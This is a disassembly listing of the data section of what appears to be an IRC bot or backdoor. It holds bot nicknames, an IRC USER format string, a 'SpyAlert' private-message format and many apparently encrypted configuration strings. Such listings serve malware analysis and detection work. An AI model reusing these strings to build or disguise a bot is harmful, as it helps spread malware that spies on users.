aBog4c3r db 'bog4c3r',0 ; DATA XREF: .text:00433484�o
aDonju4nm db 'Donju4nm',0 ; DATA XREF: .text:00433480�o
align 4
aAnkh4h db 'ankh4h',0 ; DATA XREF: .text:0043347C�o
align 4
aAte3e db 'AtE3e',0 ; DATA XREF: .text:00433478�o
align 4
aAyla db 'AYLA-',0 ; DATA XREF: .text:00433474�o
align 4
aAlb1na db 'alb1na',0 ; DATA XREF: .text:00433470�o
align 4
aIzm1rm db 'Izm1rm',0 ; DATA XREF: .text:0043346C�o
align 4
aAck0111 db 'ACK0111',0 ; DATA XREF: .text:00433468�o
aAnk32m db 'ank32m',0 ; DATA XREF: .text:00433464�o
align 4
aTurkyballs db 'turkyballs',0 ; DATA XREF: .text:00433460�o
align 10h
aAhm3t db 'ahm3t',0 ; DATA XREF: .text:0043345C�o
align 4
aPelinci db 'pelinci',0 ; DATA XREF: .text:00433458�o
aBlackp34rl db 'blackp34rl',0 ; DATA XREF: .text:00433454�o
align 4
aRetg db 'RETG-',0 ; DATA XREF: .text:00433450�o
align 4
aSamy3li db 'samy3li',0 ; DATA XREF: .text:0043344C�o
aPiram1t db 'PIRAM1T',0 ; DATA XREF: .text:00433448�o
aAslii db 'aslii',0 ; DATA XREF: .text:00433444�o
align 4
aErnesto db 'ERNESTO',0 ; DATA XREF: .text:00433440�o
aHaticem db 'haticem',0 ; DATA XREF: .text:0043343C�o
aArzu db 'ARZU',0 ; DATA XREF: .text:00433438�o
align 4
aAhm3txtc db 'Ahm3tXTC',0 ; DATA XREF: .text:00433434�o
align 10h
aDczz db 'dczz',0 ; DATA XREF: .text:00433430�o
align 4
aXtczzz db 'xTczzz',0 ; DATA XREF: .text:0043342C�o
align 10h
aXc4l db 'XC4L',0 ; DATA XREF: .text:00433428�o
align 4
aBlondu db 'Blondu-',0 ; DATA XREF: .text:00433424�o
aRot0r db 'rot0r',0 ; DATA XREF: .text:00433420�o
align 4
aAkw1dz db 'AKW1Dz',0 ; DATA XREF: .text:0043341C�o
align 10h
aBl0ndu db 'Bl0ndu',0 ; DATA XREF: .text:00433418�o
align 4
a_d db '_d',0 ; DATA XREF: .text:00433414�o
align 4
aD_ db 'd_',0 ; DATA XREF: .text:00433410�o
align 10h
aDog db 'dog-',0 ; DATA XREF: .text:0043340C�o
align 4
aNils db 'Nils-',0 ; DATA XREF: .text:00433408�o
align 10h
aRyann db 'ryann',0 ; DATA XREF: .text:00433404�o
align 4
aSmok3yS db 'smok3y-s',0 ; DATA XREF: .text:004333FC�o
align 4
aSmokeySn db 'smokey-sn',0 ; DATA XREF: .text:004333F8�o
align 10h
aR0t0 db 'r0t0',0 ; DATA XREF: .text:004333F4�o
align 4
aR0t0r db 'r0t0r-',0 ; DATA XREF: .text:004333F0�o
; .text:00433400�o
align 10h
aSud3nur db 'SUD3NUR',0 ; DATA XREF: .text:004333EC�o
aSevmekmi db 'sevmekmi',0 ; DATA XREF: .text:004333E8�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: .text:004333E4�o
align 10h
aTekir db 'tekir',0 ; DATA XREF: .text:004333E0�o
align 4
aMERV db 'M-E-R-V',0 ; DATA XREF: .text:004333DC�o
aTrr3nd db 'trr3nd',0 ; DATA XREF: .text:004333D8�o
align 4
aMel3kk db 'mel3kk',0 ; DATA XREF: .text:004333D4�o
align 10h
aAk1n db 'AK1N',0 ; DATA XREF: .text:004333D0�o
align 4
aM4ry db 'M4RY-',0 ; DATA XREF: .text:004333CC�o
align 10h
aJer1cho db 'JER1CHO',0 ; DATA XREF: .text:004333C8�o
aTolga38 db 'Tolga38',0 ; DATA XREF: .text:004333C4�o
aMizsund4y db 'mizsund4y',0 ; DATA XREF: .text:004333C0�o
align 4
aIrm4ll db 'irm4Ll',0 ; DATA XREF: .text:004333BC�o
align 4
aBenibi db 'BeNiBi',0 ; DATA XREF: .text:004333B8�o
align 4
aBerkkkko db 'berkkkko',0 ; DATA XREF: .text:004333B4�o
align 4
aHexa4a db 'hexa4a',0 ; DATA XREF: .text:004333B0�o
align 10h
aErk4nerkali db 'erk4nerkali',0 ; DATA XREF: .text:004333AC�o
aKandent db 'kandent',0 ; DATA XREF: .text:004333A8�o
aC4nsuu db 'c4nsuu',0 ; DATA XREF: .text:004333A4�o
align 4
aR45h3r db 'R45H3R',0 ; DATA XREF: .text:004333A0�o
align 4
aK3ncing db 'K3ncing',0 ; DATA XREF: .text:0043339C�o
aReshma db 'reshma',0 ; DATA XREF: .text:00433398�o
align 4
aCam3l db 'CAM3L-',0 ; DATA XREF: .text:00433394�o
align 4
aGirlzx db 'GirLzx',0 ; DATA XREF: .text:00433390�o
align 4
aIiimra db 'iiimra',0 ; DATA XREF: .text:0043338C�o
align 4
aC0redumpdd db 'C0reDumpDd',0 ; DATA XREF: .text:00433388�o
align 4
aPur3g0ld db 'pur3g0ld',0 ; DATA XREF: .text:00433384�o
align 4
aK3rm1t db 'k3rm1t',0 ; DATA XREF: .text:00433380�o
align 4
aM4n4e db 'm4n4e',0 ; DATA XREF: .text:0043337C�o
align 4
aTr0ll3r db 'tr0ll3r',0 ; DATA XREF: .text:00433378�o
aLisau db 'Lisau',0 ; DATA XREF: .text:00433374�o
align 4
aNastsha db 'nastsha',0 ; DATA XREF: .text:00433370�o
aH4xdd db 'h4xdd-',0 ; DATA XREF: .text:0043336C�o
align 4
aR1mpy db 'r1mpy',0 ; DATA XREF: .text:00433368�o
align 4
aJann0 db 'jann0',0 ; DATA XREF: .text:00433364�o
align 4
aBunty007 db 'bunty007',0 ; DATA XREF: .text:00433360�o
align 10h
aHev4l db 'hev4l',0 ; DATA XREF: .text:0043335C�o
align 4
aCmecme db 'cmecme',0 ; DATA XREF: .text:00433358�o
align 10h
aSe1nf3ld db 'se1nf3ld',0 ; DATA XREF: .text:00433354�o
align 4
aSeiny db 'seiny',0 ; DATA XREF: .text:00433350�o
align 4
aM4rcy db 'm4rcy',0 ; DATA XREF: .text:0043334C�o
align 4
aTalika db 'Talika',0 ; DATA XREF: .text:00433348�o
align 4
aShezzza db 'Shezzza',0 ; DATA XREF: .text:00433344�o
aPwntuuuu db 'pwntuuuu',0 ; DATA XREF: .text:00433340�o
align 4
aXtcXcal db 'xTc-xCaL',0 ; DATA XREF: .text:0043333C�o
align 4
aXc4libr3 db 'xc4libr3',0 ; DATA XREF: .text:00433338�o
align 10h
aK3nnn db 'k3nnn',0 ; DATA XREF: .text:00433334�o
align 4
aFl3xxxt3r db 'fl3xxxt3r',0 ; DATA XREF: .text:00433330�o
align 4
aKok00 db 'kok00',0 ; DATA XREF: .text:0043332C�o
align 4
aM4le db 'm4le',0 ; DATA XREF: .text:00433328�o
align 4
aSw1n db 'sw1n',0 ; DATA XREF: .text:00433324�o
align 4
aC4r1nna db 'C4r1nna',0 ; DATA XREF: .text:00433320�o
aKr1zha db 'KR1ZHA',0 ; DATA XREF: .text:0043331C�o
align 4
aEmilyia db 'Emilyia',0 ; DATA XREF: .text:00433318�o
aEmilya db 'emilya',0 ; DATA XREF: .text:00433314�o
align 4
aB0bm4rl3y db 'B0BM4RL3Y',0 ; DATA XREF: .text:00433310�o
align 4
aMax1xguy db 'max1xguy',0 ; DATA XREF: .text:0043330C�o
align 4
aFar0oq db 'far0oq',0 ; DATA XREF: .text:00433308�o
align 4
aSm4rt3 db 'SM4RT3',0 ; DATA XREF: .text:00433304�o
align 4
aM_1: ; DATA XREF: .text:00433300�o
; .text:004336A4�o
unicode 0, <M>,0
aN: ; DATA XREF: .text:004332FC�o
unicode 0, <N>,0
aB: ; DATA XREF: .text:004332F8�o
unicode 0, <B>,0
aV: ; DATA XREF: .text:004332F4�o
unicode 0, <V>,0
aC: ; DATA XREF: sub_41FE93+104�o
; .text:004332F0�o
unicode 0, <C>,0
asc_433E88: ; DATA XREF: .text:004332EC�o
; .text:004336D8�o ...
unicode 0, <X>,0
aZ_3: ; DATA XREF: .text:004332E8�o
unicode 0, <Z>,0
asc_433E90: ; DATA XREF: sub_41FE93+E9�o
; .text:004332E4�o
unicode 0, <L>,0
aK_0: ; DATA XREF: .text:004332E0�o
unicode 0, <K>,0
aJ: ; DATA XREF: .text:004332DC�o
unicode 0, <J>,0
asc_433E9C: ; DATA XREF: .text:004332D8�o
unicode 0, <H>,0
aG: ; DATA XREF: sub_41FE93+139�o
; .text:004332D4�o
unicode 0, <G>,0
aF: ; DATA XREF: .text:004332D0�o
; .text:004336A0�o
unicode 0, <F>,0
aD: ; DATA XREF: .text:004332CC�o
unicode 0, <D>,0
aS_5: ; DATA XREF: .text:004332C8�o
unicode 0, <S>,0
aA_1: ; DATA XREF: .text:004332C4�o
unicode 0, <A>,0
aP_3: ; DATA XREF: sub_41101E+4C�o
; .text:004332C0�o
unicode 0, <P>,0
aO_0: ; DATA XREF: .text:004332BC�o
unicode 0, <O>,0
aI_0: ; DATA XREF: .text:004332B8�o
unicode 0, <I>,0
aU_0: ; DATA XREF: .text:004332B4�o
unicode 0, <U>,0
aY: ; DATA XREF: .text:004332B0�o
unicode 0, <Y>,0
aT: ; DATA XREF: .text:004332AC�o
unicode 0, <T>,0
aR: ; DATA XREF: .text:004332A8�o
unicode 0, <R>,0
aE_0: ; DATA XREF: .text:004332A4�o
unicode 0, <E>,0
aW: ; DATA XREF: .text:004332A0�o
unicode 0, <W>,0
aQ_0: ; DATA XREF: .text:0043329C�o
unicode 0, <Q>,0
aM_2: ; DATA XREF: .text:00433298�o
; .text:0043361C�o
unicode 0, <m>,0
aN_0: ; DATA XREF: .text:00433294�o
; .text:00433620�o
unicode 0, <n>,0
aB_0: ; DATA XREF: .text:00433290�o
; .text:004335EC�o ...
unicode 0, <b>,0
aV_0: ; DATA XREF: .text:0043328C�o
; .text:0043363C�o
unicode 0, <v>,0
word_433EEC dw 63h ; DATA XREF: .text:004208F8�r
; sub_420BEE+3A�r ...
align 10h
dword_433EF0 dd 7Ah ; .text:0043364C�o ...
dword_433EF4 dd 6Ch ; .text:00433618�o
dword_433EF8 dd 6Bh ; .text:00433614�o
dword_433EFC dd 6Ah ; .text:00433610�o
dword_433F00 dd 68h ; .text:00433604�o
dword_433F04 dd 67h ; .text:00433600�o ...
dword_433F08 dd 66h ; .text:004335FC�o
dword_433F0C dd 64h ; .text:004335F4�o
dword_433F10 dd 73h ; .text:00433684�o
dword_433F14 dd 61h ; .text:0043325C�o ...
dword_433F18 dd 70h ; .text:00433628�o
dword_433F1C dd 69h ; .text:00433608�o
dword_433F20 dd 75h ; .text:00433638�o
dword_433F24 dd 79h ; .text:00433648�o
dword_433F28 dd 74h ; .text:00433634�o
word_433F2C dw 72h ; DATA XREF: sub_416C0B+BC�o
; sub_41750C+E�o ...
align 10h
dword_433F30 dd 65h ; .text:004335F8�o ...
dword_433F34 dd 77h ; .text:00433640�o
dword_433F38 dd 71h, 0 ; .text:0043362C�o ...
a0123456789abcd db '0123456789ABCDEFGHIJKLMNOPQRSTUVWXWYZabcdefghijklmnopqrstuvwxyz',0
; DATA XREF: sub_40323F+1D�o
asc_433F80: ; DATA XREF: sub_4032AA+6�o
; sub_403B2C+3D29�o ...
dw 0Ah
unicode 0, <>,0
a432 db '432',0 ; DATA XREF: sub_4032F1+8B�o
a433 db '433',0 ; DATA XREF: sub_4032F1:loc_40336B�o
; sub_41A1C8+BA�o
aSS_4 db '%s %s',0Ah,0 ; DATA XREF: sub_4032F1+6A�o
; sub_4032F1+CB�o
align 4
asc_433F94: ; DATA XREF: sub_4032F1+B�o
; .text:0040E085�o ...
unicode 0, < >,0
aSSSSMail_gmail db '%s %s',0Ah ; DATA XREF: sub_4033F0+B1�o
db '%s %s "mail.gmail.com" "127.0.0.1" :%s',0Ah,0
align 4
a_ db '-|`_\{[]}',0 ; DATA XREF: sub_403625+C8�o
; sub_403625+180�r ...
align 4
aDJstMfgyq_ db 'd/Jst/MFgyQ.',0 ; DATA XREF: sub_403B2C+C04�o
; sub_41D98A+6�o
align 4
aErwc30qfw_p0 db 'eRWc30Qfw.P0',0 ; DATA XREF: sub_403B2C+D40�o
; sub_403B2C+3A8F�o ...
align 4
a86tb1fspjg0 db '86tb/1FSpjg0',0 ; DATA XREF: sub_403B2C+9B2�o
; sub_41D98A+1C�o
align 4
aPlsymAee6v1 db 'PlsYM/aEe6v1',0 ; DATA XREF: sub_403B2C+44C�o
; sub_41D98A+27�o
align 4
aC7rq4Xpvel_ db 'c7RQ4/xPvel.',0 ; DATA XREF: sub_403B2C+22�o
; sub_403B2C:loc_403D83�o ...
align 4
aOb4iqKj5ue_ db 'Ob4iQ/KJ5ue.',0 ; DATA XREF: sub_403B2C+4D�o
; sub_403B2C+97C�o ...
align 4
aNfknl0nqigy0 db 'NFKNL0nQigY0',0 ; DATA XREF: sub_403B2C+B2B�o
; sub_41D98A+48�o
align 4
aE0idd0rdw2u db 'e0idD0RDw2U/',0 ; DATA XREF: sub_403B2C+997�o
; sub_41D98A+53�o
align 4
aS3dyJzo6r db 's3dY//JZo6r/',0 ; DATA XREF: sub_403B2C+13A5�o
; sub_41D98A+61�o
align 4
aPdazx1odsoh0 db 'PDazX1oDSOh0',0 ; DATA XREF: sub_403B2C+7E5�o
; sub_41D98A+6C�o
align 4
aUc6wg1ovwvt1 db 'uc6Wg1OvWVt1',0 ; DATA XREF: sub_403B2C+33�o
; sub_403B2C+802�o ...
align 4
aDj9owUmrbd_ db 'dJ9OW/uMRBD.',0 ; DATA XREF: sub_403B2C+3E9�o
; sub_41D98A+82�o
align 4
aP00ls0k4t_n1 db 'P00Ls0K4t.N1',0 ; DATA XREF: sub_403B2C+5B8�o
; sub_41D98A+8D�o
align 4
aL3nyw_d7tfl_ db 'l3nYW.D7Tfl.',0 ; DATA XREF: sub_403B2C+4EA�o
; sub_41D98A+98�o
align 4
aVsz2xXqjp5 db 'Vsz2x/xqJP5/',0 ; DATA XREF: sub_403B2C+885�o
; sub_41D98A+A3�o
align 4
aPnb_aBfzu60 db 'pNb.a/Bfzu60',0 ; DATA XREF: sub_403B2C+1413�o
; sub_41D98A+AE�o
align 4
aQbwgd0cfxf_ db 'qbwGd0CFxf./',0 ; DATA XREF: sub_403B2C+C9�o
; sub_403B2C+1485�o ...
align 4
a2mo7g0_b0qj db '2mo7G0.B0qj/',0 ; DATA XREF: sub_403B2C+DA�o
; sub_403B2C+1496�o ...
align 4
a1ylid_ejqp01 db '1YLId.eJQP01',0 ; DATA XREF: sub_403B2C+10FE�o
; sub_41D98A+D2�o
align 4
a47ff020f_0_ db '47Ff/020f.0.',0 ; DATA XREF: sub_403B2C+14A7�o
; sub_41D98A+DD�o
align 4
aHyomeIovtv_ db 'HyOMe/iovtV.',0 ; DATA XREF: sub_403B2C+B3�o
; sub_403B2C+15CD�o ...
align 4
aPlsymAee6v1_0 db 'PlsYM/aEe6v1',0 ; DATA XREF: sub_403B2C+1645�o
; sub_41D98A+F3�o
align 4
aCwxyh0ryouv1 db 'CwXYh0RYoUv1',0 ; DATA XREF: sub_403B2C+16A9�o
; sub_41D98A+FE�o
align 4
aEavyh_ic0dc0 db 'eAvYh.IC0dc0',0 ; DATA XREF: sub_403B2C+16D4�o
; sub_41D98A+109�o
align 4
aN1_5f0do0oh_ db 'N1.5f0Do0oH.',0 ; DATA XREF: sub_41D98A+117�o
align 4
aUz3rf_vtkug1 db 'uz3rf.VTKug1',0 ; DATA XREF: sub_403B2C+1783�o
; sub_41D98A+122�o
align 4
aI3ncg_v5u4g_ db 'I3nCG.v5U4g.',0 ; DATA XREF: sub_403B2C+18D1�o
; sub_41D98A+12D�o
align 4
a9bwj__lz2my0 db '9bWj..lZ2My0',0 ; DATA XREF: sub_403B2C+EB�o
; sub_403B2C+18F8�o ...
align 4
aRiocl1kztwo0 db 'rioCl1kzTWO0',0 ; DATA XREF: sub_403B2C+21C�o
; sub_403B2C+11F9�o ...
align 4
a_swwg1hqeii1 db '.SWwg1hqeiI1',0 ; DATA XREF: sub_403B2C+138C�o
; sub_41D98A+14E�o
align 4
aG3obv_r6j7h db 'g3obv.r6j7H/',0 ; DATA XREF: sub_403B2C+9D�o
; sub_403B2C+BF2�o ...
align 4
aM5spx_qp7lx_ db 'M5sPX.Qp7Lx.',0 ; DATA XREF: sub_403B2C+D69�o
; sub_41D98A+164�o
align 4
aF9ax112067l1 db 'f9aX112067l1',0 ; DATA XREF: sub_403B2C+F83�o
; sub_41D98A+172�o
align 4
a_hioo_5pweu_ db '.HiOo.5pwEU.',0 ; DATA XREF: sub_403B2C+298�o
; sub_41D98A+17D�o
align 4
aAjttz06ztse1 db 'ajTtz06Ztse1',0 ; DATA XREF: sub_403B2C+1AFE�o
; sub_41D98A+188�o
align 4
aUn3hk0sn58o db 'uN3hk0sn58o/',0 ; DATA XREF: sub_403B2C+1B21�o
; sub_41D98A+193�o
align 4
aQrn4z10ge1i1 db 'QRn4z10ge1I1',0 ; DATA XREF: sub_403B2C+1B50�o
; sub_41D98A+19E�o
align 4
aBvuso0ed3mw db 'bVUSO0ed3MW/',0 ; DATA XREF: sub_403B2C+1B72�o
; sub_41D98A+1A9�o
align 4
a6x2ka0buubb_ db '6x2Ka0buUbB.',0 ; DATA XREF: sub_41D98A+1B4�o
align 4
aUqyil_iyvpi_ db 'uQYiL.iYvpI.',0
align 4
a4qyyh1q2ps1 db '4QyYH1q/2ps1',0
align 4
aH6nxu_8uvej_ db 'H6NXu.8uvEj.',0
align 4
aTvjro1ubgtg1 db 'TVJrO1uBGtg1',0 ; DATA XREF: sub_403B2C+41E7�o
; sub_41D98A+1BF�o
align 4
aL80reUvcue1 db 'l80re/UvCUe1',0 ; DATA XREF: sub_403B2C+4193�o
; sub_41D98A+1CD�o
align 4
aH1cmq0wqw5c_ db 'h1cMQ0wQw5C.',0 ; DATA XREF: sub_403B2C+8C�o
; sub_403B2C+424C�o ...
align 4
a7tmte_meccn db '7Tmte.MEccn/',0 ; DATA XREF: sub_403B2C+133�o
; sub_403B2C+477E�o ...
align 4
aWn7_tNza2v db 'wN7.t/nZA2V/',0 ; DATA XREF: sub_403B2C+144�o
; sub_403B2C+478F�o ...
align 4
aGkyv90skypy db 'gkYv90Skypy/',0 ; DATA XREF: sub_403B2C+155�o
; sub_403B2C+47A0�o ...
align 4
aX2yn5_2imz1 db 'X2yN5/.2ImZ1',0 ; DATA XREF: sub_403B2C+166�o
; sub_403B2C+47B1�o ...
align 4
aNPbw1sdkiw_ db 'N/pbW1sDKiw.',0 ; DATA XREF: sub_403B2C+177�o
; sub_403B2C+47C2�o ...
align 4
aFdxpb0leh21_ db 'fDxPB0lEh21.',0 ; DATA XREF: sub_403B2C+188�o
; sub_403B2C+47D3�o ...
align 4
aVb1r0N_arr0 db 'vB1r0/N.Arr0',0 ; DATA XREF: sub_403B2C+199�o
; sub_403B2C+47E4�o ...
align 4
aUts3o_rfmks_ db 'uts3o.RfmkS.',0 ; DATA XREF: sub_403B2C+1AA�o
; sub_403B2C+47F5�o ...
align 4
aBpyvp_fw0vy1 db 'bPYVP.Fw0vY1',0 ; DATA XREF: sub_403B2C+1BB�o
; sub_403B2C+4806�o ...
align 4
aQxqog1goyq80 db 'QXqOg1gOYq80',0 ; DATA XREF: sub_403B2C+1C8�o
; sub_403B2C+4817�o ...
align 4
aVxa_uCdd7s0 db 'VXA.u/cDD7S0',0 ; DATA XREF: sub_403B2C+4233�o
; sub_41D98A+254�o
align 4
aQc9zs1zgzff0 db 'Qc9zS1zGZff0',0 ; DATA XREF: sub_403B2C+1C4D�o
; sub_41D98A+25F�o
align 4
aWpuwr_6yfru db 'WpuWr.6YFRU/',0 ; DATA XREF: sub_403B2C+1C7B�o
; sub_41D98A+26A�o
align 4
a4rmbzFcic21 db '4RmBz/FCic21',0 ; DATA XREF: sub_403B2C+1CBF�o
; sub_41D98A+275�o
align 4
aSc_coSwlk_ db 'SC.Co/swLK/.',0 ; DATA XREF: sub_403B2C+1CE2�o
; sub_41D98A+283�o
align 4
aWyf3k1fthkz_ db 'WyF3K1fTHKz.',0 ; DATA XREF: sub_403B2C+11A�o
; sub_403B2C+1DD9�o ...
align 4
aCwxsh_xflvu_ db 'cwXsH.xFlvu.',0 ; DATA XREF: sub_403B2C+1EC6�o
; sub_41D98A+299�o
align 4
aKxor8_os17a0 db 'KxOR8.oS17a0',0 ; DATA XREF: sub_403B2C+1DA6�o
; sub_403B2C+1E8F�o ...
align 4
aSasd20nmhk50 db 'sAsD20NmhK50',0 ; DATA XREF: sub_403B2C+1D8F�o
; sub_403B2C+1EA9�o ...
align 4
aHpmch0pbq800 db 'HPmCH0PbQ800',0 ; DATA XREF: sub_403B2C+1FF7�o
; sub_41D98A+2BA�o
align 4
aLees11vpbnf0 db 'LeEs11vPbnf0',0 ; DATA XREF: sub_403B2C+23A2�o
; sub_41D98A+2C5�o
align 4
aLbjvg0r_qmb_ db 'lbJVg0r.qMb.',0 ; DATA XREF: sub_403B2C+23C1�o
; sub_41D98A+2D0�o
align 4
aHj6vo0jrp9q0 db 'Hj6vo0JRP9Q0',0 ; DATA XREF: sub_403B2C+24A4�o
; sub_41D98A+2DE�o
align 4
aR7wrsQhek_0 db 'r7WRs/qHek.0',0 ; DATA XREF: sub_403B2C+2557�o
; sub_41D98A+2E9�o
align 4
aDuzcb0kgssv0 db 'DuzCb0KgSsv0',0 ; DATA XREF: sub_403B2C+27E1�o
; sub_41D98A+2F4�o
align 4
aDqjso_47pdb db 'dQJSO.47pdb/',0 ; DATA XREF: sub_403B2C+29FC�o
; sub_41D98A+2FF�o
align 4
aK9vUKkutm db 'K9V/U/KkuTM/',0 ; DATA XREF: sub_403B2C+2AC8�o
; sub_41D98A+30A�o
align 4
a7yfnz0pw11s1 db '7yfnz0PW11s1',0 ; DATA XREF: sub_403B2C+2B7B�o
; sub_41D98A+315�o
align 4
aNq_as1z1sit db 'nQ.As1Z1SIt/',0 ; DATA XREF: sub_403B2C+2C2E�o
; sub_41D98A+320�o
align 4
aUn3hk0sn58o_0 db 'uN3hk0sn58o/',0 ; DATA XREF: sub_403B2C+2C6E�o
; sub_41D98A+32B�o
align 4
aQrn4z10ge1i1_0 db 'QRn4z10ge1I1',0 ; DATA XREF: sub_403B2C+2D13�o
; sub_41D98A+339�o
align 4
aIegud0v_5_ db 'iEguD0V/.5/.',0 ; DATA XREF: sub_403B2C+2D53�o
; sub_41D98A+344�o
align 4
aFc9kk1jx11g_ db 'fc9Kk1jX11G.',0 ; DATA XREF: sub_403B2C+2D98�o
; sub_41D98A+34F�o
align 4
aDnjq8Ze3zw db 'DnjQ8/ze3ZW/',0 ; DATA XREF: sub_403B2C+2E0A�o
; sub_41D98A+35A�o
align 4
aVi0qa1mvfro1 db 'VI0QA1mvfro1',0 ; DATA XREF: sub_403B2C+2F5F�o
; sub_41D98A+365�o
align 4
aJdzdp05e7aw_ db 'jdZDp05E7aW.',0 ; DATA XREF: sub_403B2C+333F�o
; sub_41D98A+370�o
align 4
aW3gp6_13acy1 db 'W3GP6.13AcY1',0 ; DATA XREF: sub_403B2C+33A2�o
; sub_41D98A+37B�o
align 4
aZat3j_lm3ge1 db 'zAT3J.lm3Ge1',0 ; DATA XREF: sub_403B2C+34B7�o
; sub_41D98A+386�o
align 4
aLjAmKzrtp1 db 'lJ/am/kZRtP1',0 ; DATA XREF: sub_403B2C+3502�o
; sub_41D98A+394�o
align 4
aXzaru0amxhi_ db 'XZArU0aMxhi.',0 ; DATA XREF: sub_403B2C+35F6�o
; sub_41D98A+39F�o
align 4
aRa7e2Hhxpf0 db 'rA7E2/hHXPf0',0 ; DATA XREF: sub_403B2C+36EA�o
; sub_41D98A+3AA�o
align 4
aRp4sr11cvr1 db 'Rp4sR11CvR1/',0 ; DATA XREF: sub_403B2C+380B�o
; sub_41D98A+3B5�o
align 4
aZqrvt0t6nmz_ db 'ZqrVt0t6nmZ.',0 ; DATA XREF: sub_403B2C+393B�o
; sub_41D98A+3C0�o
align 4
a1shta0bzfwk1 db '1ShtA0bzFwk1',0 ; DATA XREF: sub_403B2C+39EE�o
; sub_41D98A+3CB�o
align 4
aAzcsp_hkilo_ db 'AZcsP.hkiLO.',0 ; DATA XREF: sub_403B2C+3A57�o
; sub_41D98A+3D6�o
align 4
aIkgekKykjq1 db 'iKgEK/kyKJQ1',0 ; DATA XREF: sub_403B2C+4FCB�o
; sub_41D98A+3E1�o
align 4
a6x7zf1eztny_ db '6x7zf1EztnY.',0 ; DATA XREF: sub_403B2C+4FDC�o
; sub_41D98A+3EF�o
align 4
a7otcu0fic6v0 db '7otcU0FiC6V0',0 ; DATA XREF: sub_403B2C+4FED�o
; sub_41D98A+3FA�o
align 4
aMb05gVyf8f1 db 'mb05g/VYf8f1',0 ; DATA XREF: sub_403B2C+4FFE�o
; sub_41D98A+405�o
align 4
aFyflu0ji3xh_ db 'FyFlU0jI3XH.',0 ; DATA XREF: sub_403B2C+500F�o
; sub_41D98A+410�o
align 4
aSbsip_o7v4b db 'SbsIp.o7V4B/',0 ; DATA XREF: sub_403B2C+5020�o
; sub_41D98A+41B�o
align 4
aN3saa1expwu1 db 'n3sAa1exPWU1',0 ; DATA XREF: sub_403B2C+6067�o
; sub_41D98A+426�o
align 4
aBurnP75wk db '/BURN/P75Wk/',0 ; DATA XREF: sub_403B2C+62D4�o
; sub_41D98A+431�o
align 4
aXkg84_cesgs_ db 'XkG84.cESgs.',0 ; DATA XREF: sub_403B2C+53B4�o
; sub_41D98A+43C�o
align 4
aPsern1aagh6_ db 'pSern1AAGh6.',0 ; DATA XREF: sub_403B2C+5212�o
; sub_41D98A+44A�o
align 4
aUyfog_dvvny0 db 'UyfOG.DvVnY0',0 ; DATA XREF: sub_403B2C+5039�o
; sub_41D98A+455�o
align 4
aP06vqBfbmo_ db 'p06vq/BFBMo.',0 ; DATA XREF: sub_403B2C+5564�o
; sub_41D98A+460�o
align 4
a3vvsv1vurua db '3VVsV1VuRUA/',0 ; DATA XREF: sub_403B2C+5790�o
; sub_41D98A+46B�o
align 4
a2onvg1wfjmb1 db '2ONVG1WFjmb1',0 ; DATA XREF: sub_403B2C+57A9�o
; sub_41D98A+476�o
align 4
aZqhijZaeza_ db 'ZqhIJ/ZaEZa.',0 ; DATA XREF: sub_403B2C+5999�o
; sub_41D98A+481�o
align 4
aKmdie1uwntq db 'KmdIe1UwntQ/',0 ; DATA XREF: sub_403B2C+6489�o
; sub_41D98A+48C�o
align 4
aUpx0wCz2ei0qrn db 'UPx0W/cz2EI0QRn4z10ge1I1',0 ; DATA XREF: sub_403B2C+6617�o
; sub_41D98A+497�o
align 10h
aV6jbh0k4uD_ db 'V6jBH0k4u/d.',0 ; DATA XREF: sub_403B2C+6649�o
; sub_41D98A+4A5�o
align 10h
aB2smo_whkew_qr db 'B2smo.WHkeW.QRn4z10ge1I1',0 ; DATA XREF: sub_403B2C+66E9�o
; sub_41D98A+4B0�o
align 4
aX4cty1aeqwx db 'X4Cty1aEQwX/',0 ; DATA XREF: sub_403B2C+670A�o
; sub_41D98A+4BB�o
align 4
aEm42x_1iszi1 db 'Em42x.1IsZI1',0 ; DATA XREF: sub_403B2C+5E10�o
; sub_41D98A+4C6�o
align 4
aErnniHm17t1qrn db 'ERNNi/HM17T1QRn4z10ge1I1',0 ; DATA XREF: sub_403B2C+603E�o
; sub_41D98A+4D1�o
align 4
aZk1tr0lpp5r0 db 'Zk1Tr0lpP5R0',0 ; DATA XREF: sub_403B2C+59B2�o
; sub_41D98A+4DC�o
align 4
a6ldraK4kds db '6ldRA/K4kDS/',0 ; DATA XREF: sub_403B2C+5BB9�o
; sub_41D98A+4E7�o
align 4
aX_62c_3ldcp db 'X.62C.3LDCP/',0 ; DATA XREF: sub_403B2C+5BD2�o
; sub_41D98A+4F2�o
align 4
aWt4rnWgl6v_ db 'wt4Rn/WGL6V.',0 ; DATA XREF: sub_403B2C+5DF7�o
; sub_41D98A+500�o
align 4
aXxulc08o9rf0 db 'Xxulc08O9rf0',0 ; DATA XREF: sub_403B2C+62ED�o
; sub_41D98A+50B�o
align 4
aFepmfZswfd db 'FEpMF/ZswFD/',0 ; DATA XREF: sub_403B2C+3AD6�o
; sub_41D98A+516�o
align 4
aSud8hRsu8j1 db 'sUd8h/rsu8j1',0 ; DATA XREF: sub_403B2C+202�o
; sub_403B2C+3B91�o ...
align 4
aJ2yyw_j09xc db 'j2yYw.J09XC/',0 ; DATA XREF: sub_403B2C+20F�o
; sub_403B2C+3CA7�o ...
align 4
a43ucs0rkqux_ db '43uCS0rkQUx.',0 ; DATA XREF: sub_403B2C+3D95�o
; sub_41D98A+537�o
align 4
aZjiqo07c20 db 'ZjIqO/07c2/0',0 ; DATA XREF: sub_403B2C+4828�o
; sub_41D98A+542�o
align 4
aA4pllAqpbg_ db 'a4pll/aQpBg.',0 ; DATA XREF: sub_403B2C+4A05�o
; sub_41D98A+54D�o
align 4
aNn0i61ujg7h1 db 'NN0i61uJg7H1',0 ; DATA XREF: sub_403B2C+4D02�o
; sub_41D98A+55B�o
align 4
aEavyh_ic0dc0_0 db 'eAvYh.IC0dc0',0 ; DATA XREF: sub_403B2C+4857�o
; sub_41D98A+566�o
align 4
aUfbss0cbo8c_ db 'uFbSS0Cbo8C.',0 ; DATA XREF: sub_403B2C+1D5�o
; sub_403B2C+3DAE�o ...
align 4
aNoazx1alvg0 db 'NoaZx1Alvg/0',0 ; DATA XREF: sub_403B2C+1E9�o
; sub_403B2C+3F55�o ...
align 4
aSOk db '%s OK',0 ; DATA XREF: sub_419B2F+27B�o
align 10h
aSFullTryLater db '%s Full try Later!',0 ; DATA XREF: sub_419B2F+242�o
align 4
aSSpyalertSS@SS db '%s SpyAlert: [%s!%s@%s] -> (Sent PM: "%s")',0
; DATA XREF: sub_419B2F+14B�o
align 10h
